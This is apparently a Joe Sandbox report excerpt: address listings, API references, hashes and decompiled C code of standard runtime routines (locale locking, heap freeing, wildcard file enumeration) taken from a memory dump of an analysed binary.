                                                0x00c14847
                                                0x00c1484a
                                                0x00c1484e
                                                0x00c14856
                                                0x00c14858
                                                0x00c1485b
                                                0x00c14860
                                                0x00c14860
                                                0x00c14863
                                                0x00c14867
                                                0x00c1486f
                                                0x00c14871
                                                0x00c14874
                                                0x00c14879
                                                0x00c14879
                                                0x00c14880
                                                0x00c14888
                                                0x00c1488e
                                                0x00c14895
                                                0x00c1489a
                                                0x00c1489d
                                                0x00000000
                                                0x00c1489d
                                                0x00c14708
                                                0x00c14708
                                                0x00000000
                                                0x00c14708
                                                0x00c146fa
                                                0x00c146fd
                                                0x00000000
                                                0x00c146fd
                                                0x00c146f8
                                                0x00c146c1
                                                0x00c146c1
                                                0x00c146c8
                                                0x00c146d6
                                                0x00c146d7
                                                0x00c146d9
                                                0x00c146da
                                                0x00c146e7
                                                0x00c146e7
                                                0x00c146bf
                                                0x00c1454e
                                                0x00c1454e
                                                0x00c14551
                                                0x00c14554
                                                0x00c1456c
                                                0x00c14570
                                                0x00c14577
                                                0x00c1457a
                                                0x00c1457f
                                                0x00c14584
                                                0x00c14588
                                                0x00c14589
                                                0x00c145e6
                                                0x00c145e7
                                                0x00c145e8
                                                0x00c145f6
                                                0x00c14602
                                                0x00c14607
                                                0x00c14610
                                                0x00c1458b
                                                0x00c1458b
                                                0x00c1458d
                                                0x00c1458e
                                                0x00c1458f
                                                0x00c145a0
                                                0x00c145a9
                                                0x00c145b0
                                                0x00c145b1
                                                0x00c145b4
                                                0x00c145ba
                                                0x00c145ce
                                                0x00c145ce
                                                0x00c145cf
                                                0x00c145d0
                                                0x00c145d8
                                                0x00c145e3
                                                0x00c145bc
                                                0x00c145bc
                                                0x00c145bf
                                                0x00c145c2
                                                0x00c145c4
                                                0x00c145c7
                                                0x00c145ca
                                                0x00000000
                                                0x00c145cc
                                                0x00c145cc
                                                0x00000000
                                                0x00c145cc
                                                0x00c145ca
                                                0x00c145ba
                                                0x00c14589
                                                0x00c14548
                                                0x00c14537
                                                0x00c14530
                                                0x00c14433
                                                0x00c14433
                                                0x00c14436
                                                0x00c14439
                                                0x00c14451
                                                0x00c14451
                                                0x00c14455
                                                0x00c14458
                                                0x00c1445b
                                                0x00c14464
                                                0x00c1446b
                                                0x00c1446e
                                                0x00c14472
                                                0x00c14475
                                                0x00c144a4
                                                0x00c144a4
                                                0x00c144ad
                                                0x00c14477
                                                0x00c14477
                                                0x00c14479
                                                0x00c14480
                                                0x00c14486
                                                0x00c1449a
                                                0x00c1449a
                                                0x00c1449b
                                                0x00c1449c
                                                0x00000000
                                                0x00c14488
                                                0x00c14488
                                                0x00c1448b
                                                0x00c14493
                                                0x00c14496
                                                0x00000000
                                                0x00c14498
                                                0x00c14498
                                                0x00000000
                                                0x00c14498
                                                0x00c14496
                                                0x00c14486
                                                0x00c14475
                                                0x00c1442d
                                                0x00c1441c
                                                0x00c143cb
                                                0x00c1435f
                                                0x00c1435f
                                                0x00c14364
                                                0x00c14369
                                                0x00c1436b
                                                0x00c14370
                                                0x00c14373
                                                0x00000000
                                                0x00c14373
                                                0x00c14345
                                                0x00c14345
                                                0x00000000
                                                0x00c14345
                                                0x00c14337
                                                0x00c1433a
                                                0x00000000
                                                0x00c1433a
                                                0x00c14335
                                                0x00c1432b
                                                0x00c14321

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C142C0
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C142DE
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C142FF
                                                • std::_Facet_Register.LIBCPMT ref: 00C14364
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C1437D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                • String ID:
                                                • API String ID: 459529453-0
                                                • Opcode ID: 8ebfe8e20d632cae45845ab6196c1c2920099af053116a0ba4f8360b05487617
                                                • Instruction ID: 91b4b44adea045089ada87169688f6318ae6537e872190ce199c3266202f13b5
                                                • Opcode Fuzzy Hash: 8ebfe8e20d632cae45845ab6196c1c2920099af053116a0ba4f8360b05487617
                                                • Instruction Fuzzy Hash: D331E431504201CFCB15DF14D845A9EB7E0FF82310F44461EE8559B2A1D730EE86EB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2BB44(intOrPtr* _a4) {
                                                				intOrPtr _t6;
                                                				intOrPtr* _t21;
                                                				void* _t23;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				void* _t27;
                                                
                                                				_t21 = _a4;
                                                				if(_t21 != 0) {
                                                					_t23 =  *_t21 -  *0xc42060; // 0xc420b4
                                                					if(_t23 != 0) {
                                                						E00C22F9F(_t7);
                                                					}
                                                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xc42064; // 0xc99154
                                                					if(_t24 != 0) {
                                                						E00C22F9F(_t8);
                                                					}
                                                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xc42068; // 0xc99154
                                                					if(_t25 != 0) {
                                                						E00C22F9F(_t9);
                                                					}
                                                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xc42090; // 0xc420b8
                                                					if(_t26 != 0) {
                                                						E00C22F9F(_t10);
                                                					}
                                                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                					_t27 = _t6 -  *0xc42094; // 0xc99158
                                                					if(_t27 != 0) {
                                                						return E00C22F9F(_t6);
                                                					}
                                                				}
                                                				return _t6;
                                                			}










                                                0x00c2bb4a
                                                0x00c2bb4f
                                                0x00c2bb53
                                                0x00c2bb59
                                                0x00c2bb5c
                                                0x00c2bb61
                                                0x00c2bb65
                                                0x00c2bb6b
                                                0x00c2bb6e
                                                0x00c2bb73
                                                0x00c2bb77
                                                0x00c2bb7d
                                                0x00c2bb80
                                                0x00c2bb85
                                                0x00c2bb89
                                                0x00c2bb8f
                                                0x00c2bb92
                                                0x00c2bb97
                                                0x00c2bb98
                                                0x00c2bb9b
                                                0x00c2bba1
                                                0x00000000
                                                0x00c2bba9
                                                0x00c2bba1
                                                0x00c2bbac

                                                APIs
                                                • _free.LIBCMT ref: 00C2BB5C
                                                  • Part of subcall function 00C22F9F: HeapFree.KERNEL32(00000000,00000000,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?), ref: 00C22FB5
                                                  • Part of subcall function 00C22F9F: GetLastError.KERNEL32(?,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?,?), ref: 00C22FC7
                                                • _free.LIBCMT ref: 00C2BB6E
                                                • _free.LIBCMT ref: 00C2BB80
                                                • _free.LIBCMT ref: 00C2BB92
                                                • _free.LIBCMT ref: 00C2BBA4
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: f83b61a36aff8f381d04414dc2dbc33f7422b5e184909079806257bf5edcb35a
                                                • Instruction ID: 8e785d3531cef43fd2471aeaf4f5582388afe6d5cf081ca9e07c9c2f4e828040
                                                • Opcode Fuzzy Hash: f83b61a36aff8f381d04414dc2dbc33f7422b5e184909079806257bf5edcb35a
                                                • Instruction Fuzzy Hash: 68F0D032908730BFC624EBB8F986E1A77E9BA017507A51905F059D7E59CB30FD80EA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E00C2A095(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                				intOrPtr _v0;
                                                				signed int _v6;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				intOrPtr* _v72;
                                                				intOrPtr* _v104;
                                                				intOrPtr* _v108;
                                                				intOrPtr _v112;
                                                				signed int _v124;
                                                				struct _WIN32_FIND_DATAW _v608;
                                                				char _v609;
                                                				intOrPtr* _v616;
                                                				union _FINDEX_INFO_LEVELS _v620;
                                                				union _FINDEX_INFO_LEVELS _v624;
                                                				union _FINDEX_INFO_LEVELS _v628;
                                                				signed int _v632;
                                                				union _FINDEX_INFO_LEVELS _v636;
                                                				union _FINDEX_INFO_LEVELS _v640;
                                                				signed int _v644;
                                                				signed int _v648;
                                                				union _FINDEX_INFO_LEVELS _v652;
                                                				union _FINDEX_INFO_LEVELS _v656;
                                                				union _FINDEX_INFO_LEVELS _v660;
                                                				union _FINDEX_INFO_LEVELS _v664;
                                                				signed int _v668;
                                                				union _FINDEX_INFO_LEVELS _v672;
                                                				union _FINDEX_INFO_LEVELS _v676;
                                                				intOrPtr _v724;
                                                				void* __ebx;
                                                				void* __edi;
                                                				intOrPtr* _t131;
                                                				signed int _t132;
                                                				signed int _t134;
                                                				signed int _t139;
                                                				signed int _t140;
                                                				intOrPtr* _t150;
                                                				signed int _t152;
                                                				intOrPtr _t153;
                                                				signed int _t157;
                                                				signed int _t159;
                                                				signed int _t164;
                                                				signed int _t166;
                                                				char _t168;
                                                				signed char _t169;
                                                				signed int _t175;
                                                				union _FINDEX_INFO_LEVELS _t179;
                                                				signed int _t185;
                                                				union _FINDEX_INFO_LEVELS _t188;
                                                				intOrPtr* _t196;
                                                				signed int _t199;
                                                				intOrPtr _t204;
                                                				signed int _t206;
                                                				signed int _t209;
                                                				signed int _t211;
                                                				signed int _t212;
                                                				signed int _t213;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int* _t219;
                                                				signed int _t222;
                                                				void* _t225;
                                                				union _FINDEX_INFO_LEVELS _t226;
                                                				void* _t227;
                                                				intOrPtr _t229;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				signed int _t236;
                                                				intOrPtr* _t239;
                                                				signed int _t241;
                                                				intOrPtr* _t244;
                                                				signed int _t249;
                                                				signed int _t255;
                                                				signed int _t257;
                                                				signed int _t263;
                                                				intOrPtr* _t264;
                                                				signed int _t272;
                                                				signed int _t274;
                                                				intOrPtr* _t275;
                                                				void* _t277;
                                                				signed int _t280;
                                                				signed int _t283;
                                                				signed int _t285;
                                                				intOrPtr _t287;
                                                				void* _t288;
                                                				signed int* _t292;
                                                				signed int _t293;
                                                				signed int _t295;
                                                				signed int _t296;
                                                				signed int _t297;
                                                				signed int _t299;
                                                				void* _t300;
                                                				void* _t301;
                                                				signed int _t302;
                                                				void* _t306;
                                                				signed int _t307;
                                                				void* _t308;
                                                				void* _t309;
                                                				void* _t310;
                                                				signed int _t311;
                                                				void* _t312;
                                                				void* _t313;
                                                
                                                				_t131 = _a8;
                                                				_t309 = _t308 - 0x28;
                                                				_push(__esi);
                                                				_t317 = _t131;
                                                				if(_t131 != 0) {
                                                					_t292 = _a4;
                                                					_t222 = 0;
                                                					 *_t131 = 0;
                                                					_t283 = 0;
                                                					_t132 =  *_t292;
                                                					_t232 = 0;
                                                					_v608.cAlternateFileName = 0;
                                                					_v40 = 0;
                                                					_v36 = 0;
                                                					__eflags = _t132;
                                                					if(_t132 == 0) {
                                                						L9:
                                                						_v8 = _t222;
                                                						_t134 = _t232 - _t283;
                                                						_t293 = _t283;
                                                						_v12 = _t293;
                                                						_t271 = (_t134 >> 2) + 1;
                                                						_t136 = _t134 + 3 >> 2;
                                                						__eflags = _t232 - _t293;
                                                						_v16 = (_t134 >> 2) + 1;
                                                						asm("sbb esi, esi");
                                                						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
                                                						__eflags = _t295;
                                                						if(_t295 != 0) {
                                                							_t213 = _t283;
                                                							_t280 = _t222;
                                                							do {
                                                								_t264 =  *_t213;
                                                								_t20 = _t264 + 1; // 0x1
                                                								_v20 = _t20;
                                                								do {
                                                									_t215 =  *_t264;
                                                									_t264 = _t264 + 1;
                                                									__eflags = _t215;
                                                								} while (_t215 != 0);
                                                								_t222 = _t222 + 1 + _t264 - _v20;
                                                								_t213 = _v12 + 4;
                                                								_t280 = _t280 + 1;
                                                								_v12 = _t213;
                                                								__eflags = _t280 - _t295;
                                                							} while (_t280 != _t295);
                                                							_t271 = _v16;
                                                							_v8 = _t222;
                                                							_t222 = 0;
                                                							__eflags = 0;
                                                						}
                                                						_t296 = E00C20AB9(_t136, _t271, _v8, 1);
                                                						_t310 = _t309 + 0xc;
                                                						__eflags = _t296;
                                                						if(_t296 != 0) {
                                                							_v12 = _t283;
                                                							_t139 = _t296 + _v16 * 4;
                                                							_t233 = _t139;
                                                							_v28 = _t139;
                                                							_t140 = _t283;
                                                							_v16 = _t233;
                                                							__eflags = _t140 - _v40;
                                                							if(_t140 == _v40) {
                                                								L24:
                                                								_v12 = _t222;
                                                								 *_a8 = _t296;
                                                								_t297 = _t222;
                                                								goto L25;
                                                							} else {
                                                								_t274 = _t296 - _t283;
                                                								__eflags = _t274;
                                                								_v32 = _t274;
                                                								do {
                                                									_t150 =  *_t140;
                                                									_t275 = _t150;
                                                									_v24 = _t150;
                                                									_v20 = _t275 + 1;
                                                									do {
                                                										_t152 =  *_t275;
                                                										_t275 = _t275 + 1;
                                                										__eflags = _t152;
                                                									} while (_t152 != 0);
                                                									_t153 = _t275 - _v20 + 1;
                                                									_push(_t153);
                                                									_v20 = _t153;
                                                									_t157 = E00C30542(_t233, _v28 - _t233 + _v8, _v24);
                                                									_t310 = _t310 + 0x10;
                                                									__eflags = _t157;
                                                									if(_t157 != 0) {
                                                										_push(_t222);
                                                										_push(_t222);
                                                										_push(_t222);
                                                										_push(_t222);
                                                										_push(_t222);
                                                										E00C1D97B();
                                                										asm("int3");
                                                										_t306 = _t310;
                                                										_push(_t233);
                                                										_t239 = _v72;
                                                										_t65 = _t239 + 1; // 0x1
                                                										_t277 = _t65;
                                                										do {
                                                											_t159 =  *_t239;
                                                											_t239 = _t239 + 1;
                                                											__eflags = _t159;
                                                										} while (_t159 != 0);
                                                										_push(_t283);
                                                										_t285 = _a8;
                                                										_t241 = _t239 - _t277 + 1;
                                                										_v12 = _t241;
                                                										__eflags = _t241 -  !_t285;
                                                										if(_t241 <=  !_t285) {
                                                											_push(_t222);
                                                											_push(_t296);
                                                											_t68 = _t285 + 1; // 0x1
                                                											_t225 = _t68 + _t241;
                                                											_t300 = E00C22F42(_t225, 1);
                                                											__eflags = _t285;
                                                											if(_t285 == 0) {
                                                												L40:
                                                												_push(_v12);
                                                												_t225 = _t225 - _t285;
                                                												_t164 = E00C30542(_t300 + _t285, _t225, _v0);
                                                												_t311 = _t310 + 0x10;
                                                												__eflags = _t164;
                                                												if(_t164 != 0) {
                                                													goto L45;
                                                												} else {
                                                													_t229 = _a12;
                                                													_t206 = E00C2A5C8(_t229);
                                                													_v12 = _t206;
                                                													__eflags = _t206;
                                                													if(_t206 == 0) {
                                                														 *( *(_t229 + 4)) = _t300;
                                                														_t302 = 0;
                                                														_t77 = _t229 + 4;
                                                														 *_t77 =  *(_t229 + 4) + 4;
                                                														__eflags =  *_t77;
                                                													} else {
                                                														E00C22F9F(_t300);
                                                														_t302 = _v12;
                                                													}
                                                													E00C22F9F(0);
                                                													_t209 = _t302;
                                                													goto L37;
                                                												}
                                                											} else {
                                                												_push(_t285);
                                                												_t211 = E00C30542(_t300, _t225, _a4);
                                                												_t311 = _t310 + 0x10;
                                                												__eflags = _t211;
                                                												if(_t211 != 0) {
                                                													L45:
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													E00C1D97B();
                                                													asm("int3");
                                                													_push(_t306);
                                                													_t307 = _t311;
                                                													_t312 = _t311 - 0x298;
                                                													_t166 =  *0xc42014; // 0x4fdfcf70
                                                													_v124 = _t166 ^ _t307;
                                                													_t244 = _v108;
                                                													_t278 = _v104;
                                                													_push(_t225);
                                                													_push(0);
                                                													_t287 = _v112;
                                                													_v724 = _t278;
                                                													__eflags = _t244 - _t287;
                                                													if(_t244 != _t287) {
                                                														while(1) {
                                                															_t204 =  *_t244;
                                                															__eflags = _t204 - 0x2f;
                                                															if(_t204 == 0x2f) {
                                                																break;
                                                															}
                                                															__eflags = _t204 - 0x5c;
                                                															if(_t204 != 0x5c) {
                                                																__eflags = _t204 - 0x3a;
                                                																if(_t204 != 0x3a) {
                                                																	_t244 = E00C31410(_t287, _t244);
                                                																	__eflags = _t244 - _t287;
                                                																	if(_t244 != _t287) {
                                                																		continue;
                                                																	}
                                                																}
                                                															}
                                                															break;
                                                														}
                                                														_t278 = _v616;
                                                													}
                                                													_t168 =  *_t244;
                                                													_v609 = _t168;
                                                													__eflags = _t168 - 0x3a;
                                                													if(_t168 != 0x3a) {
                                                														L56:
                                                														_t226 = 0;
                                                														__eflags = _t168 - 0x2f;
                                                														if(__eflags == 0) {
                                                															L59:
                                                															_t169 = 1;
                                                														} else {
                                                															__eflags = _t168 - 0x5c;
                                                															if(__eflags == 0) {
                                                																goto L59;
                                                															} else {
                                                																__eflags = _t168 - 0x3a;
                                                																_t169 = 0;
                                                																if(__eflags == 0) {
                                                																	goto L59;
                                                																}
                                                															}
                                                														}
                                                														_v676 = _t226;
                                                														_v672 = _t226;
                                                														_push(_t300);
                                                														asm("sbb eax, eax");
                                                														_v668 = _t226;
                                                														_v664 = _t226;
                                                														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
                                                														_v660 = _t226;
                                                														_v656 = _t226;
                                                														_t175 = E00C204AD(_t244 - _t287 + 1, _t287,  &_v676, E00C29DEA(_t278, __eflags));
                                                														_t313 = _t312 + 0xc;
                                                														asm("sbb eax, eax");
                                                														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
                                                														_t301 = _t179;
                                                														__eflags = _t301 - 0xffffffff;
                                                														if(_t301 != 0xffffffff) {
                                                															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
                                                															__eflags = _t249;
                                                															_v648 = _t249 >> 2;
                                                															do {
                                                																_v640 = _t226;
                                                																_v636 = _t226;
                                                																_v632 = _t226;
                                                																_v628 = _t226;
                                                																_v624 = _t226;
                                                																_v620 = _t226;
                                                																_t185 = E00C29FC6( &(_v608.cFileName),  &_v640,  &_v609, E00C29DEA(_t278, __eflags));
                                                																_t313 = _t313 + 0x10;
                                                																asm("sbb eax, eax");
                                                																_t188 =  !( ~_t185) & _v632;
                                                																__eflags =  *_t188 - 0x2e;
                                                																if( *_t188 != 0x2e) {
                                                																	L67:
                                                																	_push(_v616);
                                                																	_push(_v644);
                                                																	_push(_t287);
                                                																	_push(_t188);
                                                																	L33();
                                                																	_t313 = _t313 + 0x10;
                                                																	_v652 = _t188;
                                                																	__eflags = _t188;
                                                																	if(_t188 != 0) {
                                                																		__eflags = _v620 - _t226;
                                                																		if(_v620 != _t226) {
                                                																			E00C22F9F(_v632);
                                                																			_t188 = _v652;
                                                																		}
                                                																		_t226 = _t188;
                                                																	} else {
                                                																		goto L68;
                                                																	}
                                                																} else {
                                                																	_t255 =  *((intOrPtr*)(_t188 + 1));
                                                																	__eflags = _t255;
                                                																	if(_t255 == 0) {
                                                																		goto L68;
                                                																	} else {
                                                																		__eflags = _t255 - 0x2e;
                                                																		if(_t255 != 0x2e) {
                                                																			goto L67;
                                                																		} else {
                                                																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
                                                																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
                                                																				goto L68;
                                                																			} else {
                                                																				goto L67;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                																L76:
                                                																FindClose(_t301);
                                                																goto L77;
                                                																L68:
                                                																__eflags = _v620 - _t226;
                                                																if(_v620 != _t226) {
                                                																	E00C22F9F(_v632);
                                                																}
                                                																__eflags = FindNextFileW(_t301,  &_v608);
                                                															} while (__eflags != 0);
                                                															_t196 = _v616;
                                                															_t257 = _v648;
                                                															_t278 =  *_t196;
                                                															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
                                                															__eflags = _t257 - _t199;
                                                															if(_t257 != _t199) {
                                                																E00C30EE0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00C29FAE);
                                                															}
                                                															goto L76;
                                                														} else {
                                                															_push(_v616);
                                                															_push(_t226);
                                                															_push(_t226);
                                                															_push(_t287);
                                                															L33();
                                                															_t226 = _t179;
                                                														}
                                                														L77:
                                                														__eflags = _v656;
                                                														_pop(_t300);
                                                														if(_v656 != 0) {
                                                															E00C22F9F(_v668);
                                                														}
                                                														_t190 = _t226;
                                                													} else {
                                                														_t190 = _t287 + 1;
                                                														__eflags = _t244 - _t287 + 1;
                                                														if(_t244 == _t287 + 1) {
                                                															_t168 = _v609;
                                                															goto L56;
                                                														} else {
                                                															_push(_t278);
                                                															_push(0);
                                                															_push(0);
                                                															_push(_t287);
                                                															L33();
                                                														}
                                                													}
                                                													_pop(_t288);
                                                													__eflags = _v16 ^ _t307;
                                                													_pop(_t227);
                                                													return E00C17193(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
                                                												} else {
                                                													goto L40;
                                                												}
                                                											}
                                                										} else {
                                                											_t209 = 0xc;
                                                											L37:
                                                											return _t209;
                                                										}
                                                									} else {
                                                										goto L23;
                                                									}
                                                									goto L81;
                                                									L23:
                                                									_t212 = _v12;
                                                									_t263 = _v16;
                                                									 *((intOrPtr*)(_v32 + _t212)) = _t263;
                                                									_t140 = _t212 + 4;
                                                									_t233 = _t263 + _v20;
                                                									_v16 = _t233;
                                                									_v12 = _t140;
                                                									__eflags = _t140 - _v40;
                                                								} while (_t140 != _v40);
                                                								goto L24;
                                                							}
                                                						} else {
                                                							_t297 = _t296 | 0xffffffff;
                                                							_v12 = _t297;
                                                							L25:
                                                							E00C22F9F(_t222);
                                                							_pop(_t234);
                                                							goto L26;
                                                						}
                                                					} else {
                                                						while(1) {
                                                							_v8 = 0x3f2a;
                                                							_v6 = _t222;
                                                							_t217 = E00C313D0(_t132,  &_v8);
                                                							_t234 =  *_t292;
                                                							__eflags = _t217;
                                                							if(_t217 != 0) {
                                                								_push( &(_v608.cAlternateFileName));
                                                								_push(_t217);
                                                								_push(_t234);
                                                								L46();
                                                								_t309 = _t309 + 0xc;
                                                								_v12 = _t217;
                                                								_t297 = _t217;
                                                							} else {
                                                								_t218 =  &(_v608.cAlternateFileName);
                                                								_push(_t218);
                                                								_push(_t222);
                                                								_push(_t222);
                                                								_push(_t234);
                                                								L33();
                                                								_t297 = _t218;
                                                								_t309 = _t309 + 0x10;
                                                								_v12 = _t297;
                                                							}
                                                							__eflags = _t297;
                                                							if(_t297 != 0) {
                                                								break;
                                                							}
                                                							_t292 =  &(_a4[1]);
                                                							_a4 = _t292;
                                                							_t132 =  *_t292;
                                                							__eflags = _t132;
                                                							if(_t132 != 0) {
                                                								continue;
                                                							} else {
                                                								_t283 = _v608.cAlternateFileName;
                                                								_t232 = _v40;
                                                								goto L9;
                                                							}
                                                							goto L81;
                                                						}
                                                						_t283 = _v608.cAlternateFileName;
                                                						L26:
                                                						_t272 = _t283;
                                                						_v32 = _t272;
                                                						__eflags = _v40 - _t272;
                                                						asm("sbb ecx, ecx");
                                                						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
                                                						__eflags = _t236;
                                                						_v28 = _t236;
                                                						if(_t236 != 0) {
                                                							_t299 = _t236;
                                                							do {
                                                								E00C22F9F( *_t283);
                                                								_t222 = _t222 + 1;
                                                								_t283 = _t283 + 4;
                                                								__eflags = _t222 - _t299;
                                                							} while (_t222 != _t299);
                                                							_t283 = _v608.cAlternateFileName;
                                                							_t297 = _v12;
                                                						}
                                                						E00C22F9F(_t283);
                                                						goto L31;
                                                					}
                                                				} else {
                                                					_t219 = E00C1DA28(_t317);
                                                					_t297 = 0x16;
                                                					 *_t219 = _t297;
                                                					E00C1D94E();
                                                					L31:
                                                					return _t297;
                                                				}
                                                				L81:
                                                			}

















































































































                                                0x00c2a09a
                                                0x00c2a09d
                                                0x00c2a0a0
                                                0x00c2a0a1
                                                0x00c2a0a3
                                                0x00c2a0b9
                                                0x00c2a0bd
                                                0x00c2a0c0
                                                0x00c2a0c2
                                                0x00c2a0c4
                                                0x00c2a0c6
                                                0x00c2a0c8
                                                0x00c2a0cb
                                                0x00c2a0ce
                                                0x00c2a0d1
                                                0x00c2a0d3
                                                0x00c2a136
                                                0x00c2a138
                                                0x00c2a13b
                                                0x00c2a13d
                                                0x00c2a141
                                                0x00c2a14a
                                                0x00c2a14b
                                                0x00c2a14e
                                                0x00c2a150
                                                0x00c2a153
                                                0x00c2a157
                                                0x00c2a157
                                                0x00c2a159
                                                0x00c2a15b
                                                0x00c2a15d
                                                0x00c2a15f
                                                0x00c2a15f
                                                0x00c2a161
                                                0x00c2a164
                                                0x00c2a167
                                                0x00c2a167
                                                0x00c2a169
                                                0x00c2a16a
                                                0x00c2a16a
                                                0x00c2a175
                                                0x00c2a177
                                                0x00c2a17a
                                                0x00c2a17b
                                                0x00c2a17e
                                                0x00c2a17e
                                                0x00c2a182
                                                0x00c2a185
                                                0x00c2a188
                                                0x00c2a188
                                                0x00c2a188
                                                0x00c2a195
                                                0x00c2a197
                                                0x00c2a19a
                                                0x00c2a19c
                                                0x00c2a1b4
                                                0x00c2a1b7
                                                0x00c2a1ba
                                                0x00c2a1bc
                                                0x00c2a1bf
                                                0x00c2a1c1
                                                0x00c2a1c4
                                                0x00c2a1c7
                                                0x00c2a224
                                                0x00c2a227
                                                0x00c2a22a
                                                0x00c2a22c
                                                0x00000000
                                                0x00c2a1c9
                                                0x00c2a1cb
                                                0x00c2a1cb
                                                0x00c2a1cd
                                                0x00c2a1d0
                                                0x00c2a1d0
                                                0x00c2a1d2
                                                0x00c2a1d4
                                                0x00c2a1da
                                                0x00c2a1dd
                                                0x00c2a1dd
                                                0x00c2a1df
                                                0x00c2a1e0
                                                0x00c2a1e0
                                                0x00c2a1e7
                                                0x00c2a1ea
                                                0x00c2a1ee
                                                0x00c2a1fb
                                                0x00c2a200
                                                0x00c2a203
                                                0x00c2a205
                                                0x00c2a279
                                                0x00c2a27a
                                                0x00c2a27b
                                                0x00c2a27c
                                                0x00c2a27d
                                                0x00c2a27e
                                                0x00c2a283
                                                0x00c2a287
                                                0x00c2a289
                                                0x00c2a28a
                                                0x00c2a28d
                                                0x00c2a28d
                                                0x00c2a290
                                                0x00c2a290
                                                0x00c2a292
                                                0x00c2a293
                                                0x00c2a293
                                                0x00c2a297
                                                0x00c2a298
                                                0x00c2a29f
                                                0x00c2a2a2
                                                0x00c2a2a5
                                                0x00c2a2a7
                                                0x00c2a2af
                                                0x00c2a2b0
                                                0x00c2a2b1
                                                0x00c2a2b4
                                                0x00c2a2be
                                                0x00c2a2c2
                                                0x00c2a2c4
                                                0x00c2a2d8
                                                0x00c2a2d8
                                                0x00c2a2db
                                                0x00c2a2e5
                                                0x00c2a2ea
                                                0x00c2a2ed
                                                0x00c2a2ef
                                                0x00000000
                                                0x00c2a2f1
                                                0x00c2a2f1
                                                0x00c2a2f6
                                                0x00c2a2fd
                                                0x00c2a300
                                                0x00c2a302
                                                0x00c2a313
                                                0x00c2a315
                                                0x00c2a317
                                                0x00c2a317
                                                0x00c2a317
                                                0x00c2a304
                                                0x00c2a305
                                                0x00c2a30a
                                                0x00c2a30d
                                                0x00c2a31c
                                                0x00c2a322
                                                0x00000000
                                                0x00c2a325
                                                0x00c2a2c6
                                                0x00c2a2c6
                                                0x00c2a2cc
                                                0x00c2a2d1
                                                0x00c2a2d4
                                                0x00c2a2d6
                                                0x00c2a328
                                                0x00c2a32a
                                                0x00c2a32b
                                                0x00c2a32c
                                                0x00c2a32d
                                                0x00c2a32e
                                                0x00c2a32f
                                                0x00c2a334
                                                0x00c2a337
                                                0x00c2a338
                                                0x00c2a33a
                                                0x00c2a340
                                                0x00c2a347
